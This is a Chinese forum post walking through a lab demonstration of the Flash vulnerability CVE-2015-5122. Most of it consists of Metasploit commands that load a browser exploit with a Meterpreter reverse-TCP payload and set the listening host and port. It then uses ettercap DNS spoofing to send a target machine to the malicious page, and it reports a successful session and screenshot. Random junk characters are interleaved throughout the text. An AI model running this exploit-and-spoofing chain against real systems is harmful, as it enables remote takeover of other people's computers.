找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1459|回复: 0

cve2015-5122漏洞实例演示虚拟机

[复制链接]
发表于 2018-10-20 20:28:02 | 显示全部楼层 |阅读模式

! I7 f2 N0 i- n4 h5 T8 M$ e6 o 二、cve2015-5122漏洞实例演示虚拟机 6 ~" b; g# u0 Q( C

# {6 I& q. ~, A6 R- Z) @1 g

: m; B# @) o0 s9 c   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 3 z" x% {9 h7 ?( }6 k; ]- p1 D

+ }6 O) }7 C8 I+ Z# W$ U: k+ R

3 a6 |2 n, w: n! k1 ? search cve-2015-5122如图: + C2 W9 y! n- l

3 H$ Z' V3 ?) s) b2 l8 L* n2 X% k

- A3 Y+ E9 D+ q; R$ N: n   $ X8 ^' H' O8 E, M P+ L

' G( M( ]9 ^, K. ]6 @

& ~% y2 t( U- G' k& D 下面我们敲如下命令: - i3 K. ^' }+ _2 q" A

' W c X" {/ e- ?* Y

$ `+ t9 a5 Q" }, F; W use exploit/multi/browser/adobe_flash_opaque_background_uaf % U' S, a- m; Z- L2 `

5 ` }, x `' b' e

% U* ^# h# r0 y! ?8 u; y set PAYLOAD windows/meterpreter/reverse_tcp % g3 @0 N, t! \

+ |6 Y* e8 z5 n2 w0 \

" B+ {) _5 x+ v. i0 o set LHOST 192.168.0.109 & ~5 g& G3 O1 ^

6 N' i+ i- |* n0 u5 ^

; N4 S1 _+ N* b set URIPATH /                        /*根目录*/ + M/ i; G( q% [9 |- ?+ ~

8 J8 L. l# f/ U6 c3 \5 |

: Y+ n. q7 ]+ F1 F9 P) U1 e set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 " W$ ^* M \9 E+ l5 }

! v$ v) J" ]4 ^$ e

$ p, u# N" R9 d1 D* y# B% s- ~ set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 r: G: ~0 R% N. e$ c; f2 R' C; y8 I

0 T5 J7 t+ n, L0 H3 ]

7 a! Z2 K2 }) w. y! p' J 然后show options如图: * E; P# T/ p/ b5 J- `

; U) n. ?& F8 Z2 ^

* m. o; `$ I7 M$ w' d   . [% ^) g3 c* I: ?; }

' T; c! i4 ~& k" J8 h* q8 Y

2 r0 R r1 r' g/ I4 ~' u" x 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
) @' a. C- V+ ]; ?) K2 H
! `' N, L& a" J+ s4 C

4 N# H3 P6 g) G* S

) }1 _6 O7 K! F+ \- x8 ?2 e8 M! N& |/ m 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ( `! f3 T& f' z2 b. N8 X

8 Y. `, D* ?8 x( e

6 ?4 o- W$ ?2 E- _1 [( ^ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 t: s3 C4 h; K/ y( c, n6 e' h

2 f: U9 @: d2 E& G$ Q( u7 F

/ T0 S+ Y H# R$ M+ } w: F; x9 q   7 o3 _( V6 x. V- _! T, \

( C9 W9 n1 u0 J2 a9 z

+ X3 s. t# G( }" H1 o7 t 成功了,这时候我们断开ettercap,如图: , X! ^* y( p( B3 b: ?7 a4 Y9 Z/ f6 ~

9 l: N- j( p3 K3 C) {1 w/ ]- r5 G

0 a# H# A2 g: u. E1 k4 K" J   4 l% K! ^- n1 e+ P6 {+ ]

0 a7 W0 c+ o0 e! m

- H; n% N% Z2 L Screenshot如图: 4 a3 i/ m2 q7 W$ K! y

, c/ [$ P3 O W0 M |: o

* H! q, H* p% n: s5 j   2 y0 a' N( T" f" a9 n% r/ [

7 H* t: _& s ]0 w" m/ u# y Y

+ X$ \3 j, s8 b" O, E' E c" N1 b; Y5 H " c% a+ t% l: {) y- ~5 S+ l7 i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表